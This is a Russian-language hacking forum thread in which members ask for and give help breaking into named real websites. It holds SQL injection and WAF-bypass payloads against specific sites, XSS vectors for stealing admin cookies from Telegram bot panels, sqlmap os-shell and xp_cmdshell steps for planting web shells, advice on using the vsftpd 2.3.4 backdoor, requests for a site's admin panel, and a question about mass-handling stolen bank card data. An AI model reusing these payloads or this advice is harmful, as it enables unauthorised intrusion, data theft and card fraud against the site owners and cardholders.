Зайти в бота, и в админке вуаля

http://ipic.su/img/img7/fs/kiss_8kb.1565710396.png

Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)

winstrool
13.08.2019, 22:24
M.Billar said:
↑ (https://antichat.live/posts/4325263/)
Вот скажите, является ли уязвимостью тот факт, что в телеграм БОТах с админками вполне сносно работает XSS если указывать банальный код в имя-фамилию пользователя.
Большая часть админок, не фильтрует эти данные и выходит, что можно просто написать Имя: alert(document.cookie)
Зайти в бота, и в админке вуаля
http://ipic.su/img/img7/fs/kiss_8kb.1565710396.png
Бага это сервиса или разработчиков, которых даже не предупреждают о таких "возможностях" ?)


Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF https://cryptoworld.su/beef-framework/, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS

M.Billar
14.08.2019, 01:15
winstrool said:
↑ (https://antichat.live/posts/4325285/)
Да, является, с толковым подходом тут много что можно реализовать, на примере того же BEEF
https://cryptoworld.su/beef-framework/
, также в зависимости от того, как устроена/прописана админка, возможно воздействовать на функционал, опять же на примере XSS to RCE в wordpress или прочих CMS


http://ipic.su/img/img7/fs/kiss_49kb.1565730852.png

Печально обстоят дела с телегой... Ну вот что им стоит поднять задницу и профиксить это на выводе к ботам напр? А так, ходи, тр***й всех вокруг - им пофиг.

highmoore
16.08.2019, 07:42
highmoore said:
↑ (https://antichat.live/posts/4324759/)
Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь




highmoore said:
↑ (https://antichat.live/posts/4324891/)
Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось
С которым у меня не так много опыта, буду благодарен за любую помощь


Простите за дубль, но все так же в поисках решения

BenderMR
16.08.2019, 12:55
highmoore said:
↑ (https://antichat.live/posts/4325760/)
Простите за дубль, но все так же в поисках решения


Кидай в лс, раскрутим ее. Помогу чем смогу

madam
21.08.2019, 00:41
POST draw=4&columns[0][data]= '&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=Smith&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=3&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=Smith&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=3&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=Smith&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=3&columns[4][search][regex]=false&start=3&length=25&search[value]=3&search[regex]=false

A Database Error Occurred

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100' at line 4

SELECT `email`, `date` FROM `login` WHERE `referral` = 'email.txt@email.com (mailto:email.txt@email.com)' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100

Filename: libraries/Datatables.php

Line Number: 354

крутиться вообще никак не хочет может кто подскажет что

sqlmap тоже не берёт

b3
21.08.2019, 04:02
вижу 2 колонки, а остальное не понятно. columns[0][data]= ' я так понял тут инжектите? А до ваших манипуляций там какие были данные? Если `date` это columns[0][data] тогда у вас иньекция в начале запроса:


Code:
SELECT `email`, `ТУТ_СКУЛЯ` FROM `login` WHERE `referral` = 'email.txt@email.com' AND ( LIKE '%3%' OR LIKE '%3%' ) ORDER BY `date` DESC LIMIT 3, 100

в таком случае вам нужно чтоб не нарушать запрос вывести 2 колонки и отбросить остальное комментарием кода.

Либо внедрить свой код так чтоб не нарушить оставшийся запрос, по типу:

columns[0][data]=(select version())

а еще не понятно почему ругается на LIKE и почему там нет AND если инжект в реферале.

l1ght
21.08.2019, 05:11
b3 said:
↑ (https://antichat.live/posts/4326565/)
не понятно почему ругается на LIKE


ахахах нубас, рассмешил посмотри еще раз на запрос, истина где-то рядом!

BabaDook
21.08.2019, 05:24
l1ght said:
↑ (https://antichat.live/posts/4326567/)
ахахах нубас, рассмешил
посмотри еще раз на запрос, истина где-то рядом!


Лайтик :love: там нет инъекции.

п.с я чет не понял юмора

( LIKE '%3%' OR LIKE '%3%' )

madam
21.08.2019, 11:48
Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false

может у кого получится

karkajoi
21.08.2019, 16:50
madam said:
↑ (https://antichat.live/posts/4326592/)
Да не хотит крутится сайт https:/_/naira2usd.com/myreferralsx POST draw=6&columns[0][data]='&columns[0][name]=Smith&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=3&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=Smith&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=3&columns[1][search][regex]=false&start=3&length=100&search[value]=3&search[regex]=false
может у кого получится


Не хотит наверное потому что там ее нету скорее всего, ну я покрайнемере ничего необычного не увидел))

В другом месте потенциальная есть


Code:
https://naira2usd.com/confirmx
POST
draw=2&columns[0][data]=&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=true&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&start=0&length=100&search[value]='&search[regex]=false

Octavian
24.08.2019, 02:50
Обходить X-Requested-With можно только через .swf?

kostea
28.08.2019, 15:27
Привет, помогите узнать где залился файл filemanager.php7 (http://ctice.md/public/download.php?id=249) из раздела "Clasa a I-a" http://ctice.gov.md/manuale-scolare/

http://ctice.md/public/download.php?id=249

AngelEyes
29.08.2019, 22:58
[01:38:29] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5 (MariaDB fork)

[01:38:29] [INFO] fetching database names

[01:38:29] [INFO] fetching number of databases

[01:38:30] [INFO] resumed: ЩЩ

[01:38:30] [ERROR] unable to retrieve the number of databases

[01:38:30] [INFO] falling back to current database

[01:38:30] [INFO] fetching current database

[01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files

[01:38:30] [INFO] resumed: `к?

available databases [1]:

`к?

Как с этим бороться?

karkajoi
30.08.2019, 00:25
AngelEyes said:
↑ (https://antichat.live/posts/4328298/)
[01:38:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[01:38:29] [INFO] fetching database names
[01:38:29] [INFO] fetching number of databases
[01:38:30] [INFO] resumed: ЩЩ
[01:38:30] [ERROR] unable to retrieve the number of databases
[01:38:30] [INFO] falling back to current database
[01:38:30] [INFO] fetching current database
[01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
[01:38:30] [INFO] resumed: `к?
available databases [1]:
`к?
Как с этим бороться?


--hex по пробуй

AngelEyes
30.08.2019, 09:58
karkajoi said:
↑ (https://antichat.live/posts/4328315/)
--hex по пробуй


Пробовал,тамперы перепробовал

Octavian
04.09.2019, 20:28
А чем можно заменить ()в

<script>alert(1)</script>

Baskin-Robbins
04.09.2019, 21:36
Octavian said:
↑ (https://antichat.live/posts/4329400/)
А чем можно заменить ()в
<script>alert(1)</script>


пробуй alert`aaa`

вот тебе пример /threads/424991/page-17 (https://antichat.live/threads/424991/page-17/)

но если отработает такая штука, то алерт не нужен

Octavian
04.09.2019, 21:48
Baskin-Robbins said:
↑ (https://antichat.live/posts/4329415/)
пробуй alert`aaa`
вот тебе пример
/threads/424991/page-17 (https://antichat.live/threads/424991/page-17/)
но если отработает такая штука, то алерт не нужен



Не выходя из <script>нужно выполнить xss без ;()

karkajoi
06.09.2019, 14:54
man474019 said:
↑ (https://antichat.live/posts/4329710/)
hi
sqli very hard WAF
can u help ?
link:
link (http://ciic.az/blog/category/events/1')


Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.

crlf
06.09.2019, 15:51
Octavian said:
↑ (https://antichat.live/posts/4329419/)
Не выходя из <script>нужно выполнить xss без ;()




Code:
document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x 61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e \x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//

Bo0oM
06.09.2019, 16:45
crlf said:
↑ (https://antichat.live/posts/4329744/)

Code:
document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x 61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e \x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//





Code:
onerror=eval;throw'=alert\x281\x29'

Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)


Code:
onerror=eval;throw window.name

Octavian
08.09.2019, 23:28
Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их

Baskin-Robbins
08.09.2019, 23:49
Octavian said:
↑ (https://antichat.live/posts/4330310/)
Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их


миллиона тебе достаточно? много не всегда есть хорошо


Code:
https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt

November15
11.09.2019, 17:26
http://e-learn.i5t.ru/ можно ли ,что-либо сделать?

fandor9
11.09.2019, 19:38
November15 said:
↑ (https://antichat.live/posts/4331033/)
http://e-learn.i5t.ru/
можно ли ,что-либо сделать?


учиться можно, вот https://e-learn.i5t.ru/enrol/index.php?id=2 ))

November15
11.09.2019, 20:32
Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)


fandor9 said:
↑ (https://antichat.live/posts/4331081/)
учиться можно, вот
https://e-learn.i5t.ru/enrol/index.php?id=2
))

fandor9
12.09.2019, 00:12
November15 said:
↑ (https://antichat.live/posts/4331100/)
Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)


Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.

November15
12.09.2019, 00:26
VSFTPD v2.3.4


fandor9 said:
↑ (https://antichat.live/posts/4331134/)
Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.

fandor9
12.09.2019, 00:39
November15 said:
↑ (https://antichat.live/posts/4331137/)
VSFTPD v2.3.4


Бэкдор (https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor) то была всего несколько дней, не факт что она там есть, либо хостеру совсем уж пох..

November15
13.09.2019, 08:38
Если присутствует, то как возможно раскрутить?


fandor9 said:
↑ (https://antichat.live/posts/4331139/)
Бэкдор (https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor)
то была всего несколько дней, не факт что она там есть, либо хостеру совсем уж пох..

pacojaveh
14.09.2019, 14:51
Всем привет,помогите пожалуйста ситуация такая:

Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.

И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799

RWD
14.09.2019, 17:50
pacojaveh said:
↑ (https://antichat.live/posts/4331579/)
Всем привет,помогите пожалуйста ситуация такая:
Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799


не нужно постить одно и тоже по десять раз, в разных темах

Octavian
17.09.2019, 14:22
В JSON-е возвращается 2+2 на странице выводется 4 также срабатывает sqrt, pow ... как мне получить хотябы Self XSS, если вводить alert(1) пишет на странице { Check formula }, может DOS формулой как то?

Octavian
24.09.2019, 01:11
Привет, есть простая CSRF но в запросе JSON, как отправить JSON из формы без = в конце, с флешом не вариант

DezMond™
06.10.2019, 16:22
help!


Code:
https://www.clemenshospital.de/unternehmen/presse-und-aktuelles/pressemitteilungen/pressemitteilung/?cHash=3e1a0675b9b0455db1168f0342035939&tx_browser_pi1%5Bsort%5D=tx_browser_pi1%5Bsort%5D= a

noppathee
06.10.2019, 21:11
sqlmap с параметром --os-shell такой результат:

os-shell> whoami

do you want to retrieve the command standard output? [Y/

[11:11:38] [INFO] retrieved: nt authority\network servic

command standard output: 'nt authority\network service'

os-shell>

Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?

Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';

Но как узнать конечную директорию, в которую заливаться?

Спасибо!

karkajoi
06.10.2019, 21:21
noppathee said:
↑ (https://antichat.live/posts/4336871/)
sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!


ну надо знать путь, команда pwd, если путь не знаешь, тогда брутом, или искать где эти пути палятся

p.s путь в ошибке бывает показывает

BabaDook
07.10.2019, 02:34
noppathee said:
↑ (https://antichat.live/posts/4336871/)
sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!


sqlmap --os-shell -> 4 -> 2 итд


DezMond™ said:
↑ (https://antichat.live/posts/4336795/)
help!

Code:
https://www.clemenshospital.de/unternehmen/presse-und-aktuelles/pressemitteilungen/pressemitteilung/?cHash=3e1a0675b9b0455db1168f0342035939&tx_browser_pi1%5Bsort%5D=tx_browser_pi1%5Bsort%5D= a



Задетекти место инъекции


man474019 said:
↑ (https://antichat.live/posts/4334805/)
in target when try sleep() target loads and gives response 504 Gateway Time-out, also tested sleep(5), sleep(10) and etc.., same result (504)
scanners detects it sql injection, but sqlmap not
what means it vuln ? thanks in advance
p.s server is nginx


or 1=1; or 1=2; and etc

Muracha
07.10.2019, 11:30
sql иньекция в POST запросе админ панели.

В поле логин при постановке кавычки показывает сообщение:


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 2' at line 1


При переборе полей методом


' order by 6#


показывает сообщение


Unknown column '6' in 'order clause'


Если ' order by 5# то пользователь не найден

Запрос ' union select 1,2# дает результат:


The used SELECT statements have a different number of columns


А ' union+select+1,2,3,4,5#


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '
+select+1,2,3
' LIMIT 2' at line 1


То есть обрезается до 3 полей.

При ' union select 1,2,3,4,5#

и выводит ошибку:


You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''
LIMIT 2
' at line 1


Как правильно составить запрос и почему не выводится кол-во полей?

' union select 1,2,3,4,5#или ' union+select+1,2,3,4,5#?

Muracha
08.10.2019, 15:09
И в чем может проявляться проблема когда при слепой инъекции выводились данные со скрипом, а спустя сутки-двое при наличии той же уязвимости(её не закрыли) выводится


[13:56:51] [ERROR] invalid character detected. retrying..
[13:58:23] [ERROR] unable to properly validate last character value ('2')..


?

Запрос


--tamper=between --random-agent --time-sec=10 --delay=5 --sql-shell --hex

noppathee
10.10.2019, 23:20
BabaDook said:
↑ (https://antichat.live/posts/4336905/)
sqlmap --os-shell -> 4 -> 2 итд


https://i.imgur.com/qDWspdZ.png

Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?

Цель: залить шелл.

Или как вариант заказал бы платную консультацию у профи, т.к. хочется понять как действовать, позадавать вопросы.

Спасибо!

BabaDook
11.10.2019, 01:08
Ты вообще уверен что прав хватит?

если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.

noppathee
11.10.2019, 10:47
BabaDook said:
↑ (https://antichat.live/posts/4337653/)
Ты вообще уверен что прав хватит?
если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.




man474019 said:
↑ (https://antichat.live/posts/4337689/)
try --current-user --is-dba
and see response true or false ? if false there're no variants for uploading shell via sqli/sqlmap


https://i.imgur.com/qip6cro.png

Baskin-Robbins
11.10.2019, 14:24
noppathee said:
↑ (https://antichat.live/posts/4337638/)
Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?


Давайте смотреть что мы имеем и пытаться понять как нам действовать.


Слепая инъекция

Ос винда

Субд mssql

Текущий юзер DBA
Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"

Следовательно результат выполнения команды мы увидеть не можем.

Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.

Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.

/threads/30501/ (https://antichat.live/threads/30501/)

Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping

и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно

найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.

Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.

https://github.com/tennc/webshell

Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.

BabaDook
12.10.2019, 18:20
noppathee said:
↑ (https://antichat.live/posts/4337707/)
https://i.imgur.com/qip6cro.png


Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо

BabaDook
12.10.2019, 18:21
Baskin-Robbins said:
↑ (https://antichat.live/posts/4337739/)
Давайте смотреть что мы имеем и пытаться понять как нам действовать.

Слепая инъекция

Ос винда

Субд mssql

Текущий юзер DBA

Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"
Следовательно результат выполнения команды мы увидеть не можем.
Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.
Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.
/threads/30501/ (https://antichat.live/threads/30501/)
Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно
найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.
Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.
https://github.com/tennc/webshell
Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.


нам не надо получать вывод команд. Есть возможность получить шелл, и кстати вывод команд тоже можно получить

fandor9
12.10.2019, 18:25
Baskin-Robbins said:
↑ (https://antichat.live/posts/4337739/)
Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера.


Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?


BabaDook said:
↑ (https://antichat.live/posts/4337987/)
Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо


так у него и так сразу системная шелл вылазит


noppathee said:
↑ (https://antichat.live/posts/4337638/)
https://i.imgur.com/qDWspdZ.png

Baskin-Robbins
13.10.2019, 01:42
BabaDook said:
↑ (https://antichat.live/posts/4337988/)
нам не надо получать вывод команд.


Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит


BabaDook said:
↑ (https://antichat.live/posts/4337988/)
Есть возможность получить шелл, и кстати вывод команд тоже можно получить


По линку есть материал на эту тему


fandor9 said:
↑ (https://antichat.live/posts/4337989/)
Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?


Хорошо что заметил, еще бы линк добавить

/threads/434712/ (https://antichat.live/threads/434712/)

Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше

BabaDook
13.10.2019, 01:50
Baskin-Robbins said:
↑ (https://antichat.live/posts/4338046/)
Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит
/threads/434712/ (https://antichat.live/threads/434712/)


Согласен. самое простое конечно пинг на свой хост. Дальше от этого уже плясать.

fandor9
13.10.2019, 14:06
Baskin-Robbins said:
↑ (https://antichat.live/posts/4338046/)
По линку есть материал на эту тему
Хорошо что заметил, еще бы линк добавить
/threads/434712/ (https://antichat.live/threads/434712/)
Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше


В принципе на линуксе всё достаточно просто


Code:
iptables -I INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j LOG --log-level=1 --log-prefix "Ping Request "

и затем в консоли включаем


Code:
dmesg --follow

и там уже видим идёт ли пинг и от какого адреса (SRC=). Но опять-тако зависит от того, как настроена система, может быть что пинги до этого сбрасывает раутер.

На винде это немного сложнее, нужно сначала сконфигурировать брандмауэр винды (https://docs.microsoft.com/ru-ru/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ff428145(v=ws.10)) и потом уже смотреть логи брандмауэра.

to the moon
28.10.2019, 11:12
Попалась ситуация при раскрутке SQL иньекта, из которой не могу выбраться, буду признателен, если кто что подскажет.

Имеем вот такой MySql запрос:


Code:
SELECT test_value from table
where testmemo LIKE \'%'.$_POST['SQL'].'%\'
ORDER BY LOCATE(\''.$_POST['SQL'].'\',index);

Фильтруются символы # и * (без разницы, сырые, или в urlencode).

Комментарий -- 1 не срабатывает, хотя и не фильтруется. Кавычка ` в качестве комментария тоже не работает (про нулл байт вообще молчу).

Вставить например error-based вектор, а всё остальное закомментировать не получается, следовательно остается корректно достроить существующий запрос, но вот тут и начинаются проблемы.

Наш иньект попадает в запрос сразу в двух местах, в одном месте он обрамлен одинарными кавычками, а во втором случае ещё и взят в скобки.

И как в данной ситуации выкрутиться я не могу сообразить.

crlf
28.10.2019, 11:25
to the moon said:
↑ (https://antichat.live/posts/4341596/)
Вставить например error-based вектор, а всё остальное закомментировать не получается




Code:
' AND extractvalue(1,concat(0x3a,(select @@version)))-'

2dd
28.10.2019, 14:07
Уже не в первый раз встречаюсь с ситуацией, когда раскрутив MySQL иньект, при попытке взаимодействия с существующей таблицей, SQL иньект пропадает, и при этом если указать несуществующую таблицу, то всё ок.

Т.е. при запросе select count(*) from not_exists_table (который следует как подзапрос в error или union based векторах), если таблицы нет, то будет стандартная ошибка Table 'not_exists_table' doesn't exist

Если же указать реально существующую, то как будто SQL фильтруется. И так на очень многих сайтах. Сайты разные, и друг с другом никак не взаимосвязаны.

Если кто знает, как решить эту беду, подскажите.

Estet
28.10.2019, 14:27
Напишу сюда.

ребята, кто шарит в sql inj, возможно кто-то желает оказывать персональную помощь, по различным вопросам в джабер за оплату?

Вопросы в основном по WAF и извлечению данных. (допустим почему выдает 500 ошибку или 400, к примеру)

Как заливать шелы, получать права и прочее такое не нужно.

Я мало в этом шарю, пользуюсь sqlmap и burp (automated scan), поэтому объяснять нужно как чайнику доступным языком.

Именно поэтому готов платить за помощь.

Так же сотрудничество на перспективу, я щедрый, с теми кто со мной честен и добр)))))

У меня не совсем тривиальная ситуация, объясню в джабере.

Пишите : 7jon7doe@cluster.sx (mailto:7jon7doe@cluster.sx)

Много вашего времени не займу, в день может пара тройка вопросов!

Чуть дополню, мне скорее подойдет человек, который шарит в коде и чуть в скуле. На какие то вопросы ты мне ответишь, в каких-то вместе будем разбираться. Я это к тому, что врятли опытному хакеру нужна будет мелочь))

BenderMR
30.10.2019, 06:52
помогите раздекодить строку. Проверяю и API и вся инфа с формы отправляется в таком виде


Code:
5d000008007200000000000000003d8888865474ae3953ed45 d37f263bd75edbffa14070ca8100680ed91a004e8f482ba622 d6df8a57cf5800cbf802a3eaa2e536c0c7f9c0c3d50668e4f5 6367357f70f75394537e88edff509845cb5dba03414af6cefe dcc2c0c0fe453ca5ff57f3b216a833480a6dc4

Похоже на hex, но когда пробую декодить выдает какие то непонятные символы. Сайт китайский, может дело в этом. И как в таком случае с этим работать, потому что ни берпом, ни онлайн не вышло

DezMond™
02.11.2019, 18:03
Помогите ваф обойти


Code:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 34,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+

Octavian
04.11.2019, 23:04
У меня такой вопрос, как легко убрать cvc с несколько сотен банковских карт, нет гаджета для этого?

Octavian
04.11.2019, 23:23
Также можно ли сказать банку чтоб выпускать банковские карты без CVV?

Estet
05.11.2019, 15:26
BenderMR said:
↑ (https://antichat.live/posts/4341998/)
непонятные символы


может они тебе и нужны, сайт то


BenderMR said:
↑ (https://antichat.live/posts/4341998/)
китайский


либо шрифты проверить, что бы стояли нужные (китайский?)

For Octavian: (https://antichat.live/members/267561/)что за бред? (https://antichat.live/members/267561/)

Octavian
05.11.2019, 15:40
Estet said:
↑ (https://antichat.live/posts/4343504/)
может они тебе и нужны, сайт то
либо шрифты проверить, что бы стояли нужные (китайский?)
For
Octavian: (https://antichat.live/members/267561/)что за бред? (https://antichat.live/members/267561/)


?

kostea
06.11.2019, 19:53
Очень нужна админка http://makler.md/ помогите

kostea
09.11.2019, 01:19
Мда жаль что зашифрованы пароли

Estet
09.11.2019, 20:47
man474019 said:
↑ (https://antichat.live/posts/4343886/)
http://back.makler.md/


расскажи, как нашел?

Baskin-Robbins
09.11.2019, 21:07
Estet said:
↑ (https://antichat.live/posts/4344521/)
расскажи, как нашел?


один из способов

/threads/470561/ (https://antichat.live/threads/470561/)

BabaDook
10.11.2019, 00:25
john_newman said:
↑ (https://antichat.live/posts/4344553/)
Вопрос:
есть сайт вида
http://site.com/legasy
при подстановки ковычки
http://site.com/legasy
'
выходит сообщение:
SELECT * FROM mx_category WHERE seoUri = '/legasy'' AND status='1'
SELECT * FROM mx_category WHERE seoUri = '/legasy'' AND status='1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
Вопрос: как раскрутить руками, либо как сформировать запрос в SQLmap ?


sqlmap -u "http://site.com/legasy*"

Руками начать с http://site.com/legasy'+--+- ; http://site.com/legasy'# (http://site.com/legasy')

erwerr2321
10.11.2019, 01:53
"site.com/blablabl_id=3&blbalbalba_id=5*&blbalbalba_id=6"

либо через -p blbalbalba_id

вообще, тема sqlmap тут! (https://antichat.live/threads/431199/)

BabaDook
10.11.2019, 01:57
john_newman said:
↑ (https://antichat.live/posts/4344573/)
А подскажи ещё,
А вот есть ссылка к примеру
site.com/blablabl_id=3&blbalbalba_id=5&blbalbalba_id=6
Уязвимый параметр по середине blbalbalba_id=5 так как при подставлении ковычки вылазит ошибка.
